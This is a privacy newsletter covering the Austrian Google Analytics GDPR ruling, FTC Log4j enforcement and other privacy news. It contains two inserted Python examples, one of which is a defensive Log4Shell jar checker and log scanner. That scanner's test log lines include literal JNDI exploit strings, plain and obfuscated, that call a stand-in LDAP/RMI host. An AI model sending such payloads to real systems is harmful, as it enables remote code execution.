January 14, 2022
There are no doubt some important conversations happening inside board rooms today after Austria's data protection authority decided that one website's use of Google Analytics violated the GDPR.
The regulator said that a health-focused website in the country, which was transferring visitors' IP address data to Google in the U.S. via Google Analytics, violated the law.
Google Analytics is a widely used tool to help organizations understand how visitors use their sites and apps. Google says the tool is never used to track people across sites or apps and that customers are prohibited from uploading information that could be used to identify a person. But the Austrian DPA said an IP address, combined with other data, can identify a person and is therefore personal data.
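To make the "IP address is personal data" point concrete, here is an added example (not code from the newsletter, from Google, or from the Austrian decision) of the server-side IP truncation that Google's Universal Analytics anonymizeIp option documents: the last octet of an IPv4 address and the last 80 bits of an IPv6 address are zeroed before an event is forwarded. The event record, its field names and the prefix constants are this example's own assumptions. The scrubber deliberately leaves the client ID and user agent untouched, which is exactly the regulator's caveat: truncating the IP shrinks the identifying information but does not remove the other data it is combined with.

```python
"""Added example, not from the Osano newsletter or from Google: IP truncation
before an analytics event leaves your infrastructure. Constants, event
fields and SAMPLE_EVENT are constructed for this example."""
import ipaddress

# Prefix lengths matching the truncation Google documented for the
# Universal Analytics anonymizeIp option (assumed here as the example's own
# constants): keep a /24 of an IPv4 address, a /48 of an IPv6 address.
V4_PREFIX = 24
V6_PREFIX = 48


def anonymize_ip(ip_str: str) -> str:
    """Zero the host part of an address. Raises ValueError on junk input so a
    malformed header cannot slip through untruncated."""
    ip = ipaddress.ip_address(ip_str.strip())
    prefix = V4_PREFIX if ip.version == 4 else V6_PREFIX
    network = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
    return str(network.network_address)


def anonymity_set_size(ip_str: str) -> int:
    """How many distinct addresses collapse onto the same truncated value.
    256 for IPv4 is small; combined with a cookie ID it identifies one visitor."""
    ip = ipaddress.ip_address(ip_str.strip())
    prefix = V4_PREFIX if ip.version == 4 else V6_PREFIX
    return 2 ** (ip.max_prefixlen - prefix)


def scrub_event(event: dict) -> dict:
    """Return a copy of an outbound analytics event with only the truncated IP.
    client_id and user_agent are left as they are on purpose: they are still
    identifiers, which is why truncation alone does not settle the question."""
    scrubbed = dict(event)
    scrubbed["client_ip"] = anonymize_ip(event["client_ip"])
    return scrubbed


SAMPLE_EVENT = {  # constructed; 203.0.113.0/24 is the TEST-NET-3 range
    "client_ip": "203.0.113.77",
    "client_id": "1234567890.1642000000",
    "user_agent": "Mozilla/5.0",
    "page": "/pricing",
}

if __name__ == "__main__":
    print(scrub_event(SAMPLE_EVENT))
    print(anonymize_ip("2001:db8:abcd:1234:5678::1"), anonymity_set_size("2001:db8::1"))
```

Run the scrub on the server that receives the request, not in the browser: once the raw address has reached Google's collection endpoint the transfer the Austrian regulator objected to has already happened.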
A little context: Europe is very worried about U.S. authorities' access to EU citizens' data. That is the reason, in general, that the Court of Justice of the European Union struck down the Safe Harbor Framework in 2015 and then did the same to its successor, Privacy Shield, in 2020.
The drama began when Max Schrems, a Facebook user, asked the company what personal data it held about him. Dissatisfied with the company's practices, he asked the Irish Data Protection Commission to investigate. This happened after the Snowden revelations, and Schrems was concerned that U.S. intelligence agencies could access his personal data, because U.S. surveillance law lets those agencies obtain data from U.S. providers in ways an EU resident can neither see nor challenge in court.
Schrems I is the case that resulted in Safe Harbor's demise. With Schrems II, Privacy Shield dissolved.
Both cases were hugely problematic for U.S. companies that had relied on the frameworks to export data out of the EU legally.
This decision by Austria's regulator follows the same European concern: data stored in the U.S. isn't protected the way the GDPR protects it. That's a big problem because if you've ever watched a Congressional hearing on Section 702 of FISA, the provision that lets U.S. intelligence agencies collect the communications of non-U.S. persons abroad from U.S. providers, the FBI and the NSA aren't interested in giving up that power. They say it's essential in thwarting terrorism and crime. Much of the work done under 702 is classified, however, so it's never exactly clear how impactful having broad access to data has been.
The implications of this Austrian case aren't yet clear. I asked Twitter what people are thinking and what kind of conversations organizations using Google Analytics are having. This response was pretty good, I thought:
"Has anyone been in touch with IT yet?"
"Where is our DPO when we need it?"
"How do you install that weird @matomo_org thing again?" pic.twitter.com/GvxZxrEMdd
— Christopher Schmidt (@PiracyByDesign) January 14, 2022
For its part, Google released a statement explaining analytics and saying, in part, that it applies numerous safety measures to protect data transferred outside of the EU. "Our infrastructure and encryption is designed to protect data and safeguard it from any government access."
What's a company to do? I don't know yet. But as this story plays out, I'll keep you updated. I promise!
For now, enjoy a round-up of this week's major privacy news, and I'll see you next week!
Austrian data protection authority rules site's use of Google Analytics violates GDPR
Austria's data protection authority has found that a website using Google Analytics (and thus exporting its visitors' data to the U.S.) violated the EU's GDPR. The regulator said IP addresses are personal data. Despite Google's assertion that it had implemented protections for the data, such as encryption at rest in its data centers, the regulator said it did not find "sufficient safeguards had been put in place to effectively block U.S. intelligence services from accessing the data, as required to meet the GDPR's standard," TechCrunch reports.
FTC threatens to enforce against organizations that neglect to patch Log4j
On Dec. 9, a vulnerability in Log4j disrupted organizations around the globe. The flaw (CVE-2021-44228, known as Log4Shell) in the widely used logging library for the Java programming language lets an attacker run arbitrary code on any system that logs attacker-controlled text with a vulnerable version of the library. It's been over a month, but "the crisis shows no sign of abating," Brookings Institution reports. Because the U.S. doesn't have broad rules on how to handle the risk, the Federal Trade Commission has told companies they have a legal duty to take "reasonable steps to mitigate." It also threatened to come down on companies that fail to do so, citing its $700 million settlement with Equifax over the 2017 breach, which happened after Equifax failed to patch a known vulnerability in Apache Struts.
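What "reasonable steps to mitigate" looks like in practice is (1) finding the vulnerable library in what you ship and (2) checking whether anyone has already probed you. The following is an added example, not code from the newsletter, the FTC or the Log4j project: it inspects a log4j-core jar for its version and for the presence of JndiLookup.class (deleting that class from the jar was the documented workaround for deployments that could not upgrade at once), and it scans access-log lines for JNDI lookup strings, including the nested-lookup tricks attackers used to split the word "jndi". The in-memory jar builder, the sample log lines and the helper names are constructed for this example; the version thresholds are the Java 8+ 2.x line only.

```python
"""Added example, not code from the Osano newsletter, the FTC or Log4j:
two local checks for Log4Shell (CVE-2021-44228). build_jar, SAMPLE_LOGS
and the helper names are constructed for this example."""
import io
import re
import zipfile

POM_PATH = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Java 8+ line: 2.15.0 removed the message-lookup RCE; 2.17.1 also closed the
# follow-on CVEs (2021-45046, 2021-45105, 2021-44832). The Java 6/7 branches
# (2.3.x, 2.12.x) have their own fixed releases and are not modelled here.
FIX_44228 = (2, 15, 0)
FULLY_PATCHED = (2, 17, 1)


def parse_version(pom_properties: str):
    """Extract the numeric version tuple from a Maven pom.properties body."""
    for line in pom_properties.splitlines():
        if line.startswith("version="):
            return tuple(int(n) for n in re.findall(r"\d+", line)[:3])
    return None


def assess_jar(jar_bytes: bytes) -> dict:
    """Inspect a log4j-core jar: version, whether JndiLookup.class is still
    inside it, and a verdict for the Java 8+ release line."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        version = parse_version(zf.read(POM_PATH).decode()) if POM_PATH in names else None
    has_jndi = JNDI_CLASS in names
    if version is None:
        verdict = "unknown"
    elif version >= FULLY_PATCHED:
        verdict = "patched"
    elif version >= FIX_44228:
        verdict = "upgrade"       # RCE fixed, later CVEs not
    elif has_jndi:
        verdict = "vulnerable"
    else:
        verdict = "mitigated"     # old version but the lookup class was stripped
    return {"version": version, "jndi_lookup_present": has_jndi, "verdict": verdict}


def build_jar(version: str, include_jndi_class: bool) -> bytes:
    """Constructed test fixture: a minimal in-memory jar carrying only the
    two entries assess_jar looks at."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PATH, f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


# Attackers split "jndi" with nested lookups such as ${lower:j} or ${::-n};
# collapse the common one-character forms before matching.
OBFUSCATION = re.compile(r"\$\{(?:lower|upper):(\w)\}|\$\{[^{}]*?:-([^{}])\}", re.IGNORECASE)
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)


def deobfuscate(text: str) -> str:
    """Repeatedly resolve single-character lookup tricks until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = OBFUSCATION.sub(lambda m: m.group(1) or m.group(2), text)
    return text


def find_jndi_probes(log_lines):
    """Return the raw lines that carry a JNDI lookup string, obfuscated or not."""
    return [line for line in log_lines if JNDI_PATTERN.search(deobfuscate(line))]


SAMPLE_LOGS = [  # constructed access-log lines; 198.51.100.7 is TEST-NET-2
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}${::-n}di:rmi://198.51.100.7:1099/b}"',
    '10.0.0.3 - - "GET /search?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]

if __name__ == "__main__":
    print(assess_jar(build_jar("2.14.1", True)))
    for hit in find_jndi_probes(SAMPLE_LOGS):
        print("JNDI probe:", hit)
```

For a real estate, feed assess_jar the bytes of every log4j-core*.jar you can find, including ones nested inside fat jars and container images, and keep the output: the FTC's point is that being able to show the inventory and the remediation date is what "reasonable steps" turns into when an investigator asks.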
German telecom law contains new rules on tracking cookies
On Dec. 1, 2021, Germany's Telecommunications-Telemedia Data Protection Act (TTDSG) came into force. The law regulates services like email and messaging and codifies into national law that organizations storing information on, or reading information from, a user's device, tracking cookies included, must obtain consent regardless of whether personal data is processed. Here's what you need to know about how the rule applies to cookies.
US lawmakers introduce TLDR Act
The Washington Post reports that a bipartisan group of lawmakers has introduced legislation that would require websites to make their terms of service agreements easy for users to digest. There's plenty of data suggesting users don't read a website's terms before agreeing to them: they're long and filled with legalese. The TLDR Act would require sites to display a "summary statement" that not only discloses their terms in an "easy to understand" manner but also whether they've had a data breach recently and what sensitive personal data they collect.
VR headsets are fun, but could help your employer spy ... so
The Washington Post reports on virtual reality headsets, which pundits say will become part of everyday working life within the next few years. But a headset can collect more data about the person wearing it than the average computer screen can, which gives “companies more opportunities to take and share that data for profiling and advertising.” The Washington Post reports that it could provide both employers and the government the ability to monitor behavior.
Upcoming webinar: How to build a privacy program
It can be a daunting task to be assigned "privacy" at your organization. Depending on the resources and budget your company is willing to spend, there's no one-size-fits-all checklist to follow. But there are steps you can take, whether you're an office of one or further along the privacy maturity spectrum, toward building a sophisticated and agile privacy program. This free webinar features three privacy experts who've built their own programs and will share concrete strategies and action items you can use whether you're a beginner or advanced.
Writer at Osano
The Osano staff is a diverse team of free thinkers who enjoy working as part of a distributed team with the common goal of working to make a more transparent internet. Occasionally, the team writes under the pen name of our mascot, “Penny, the Privacy Pro.”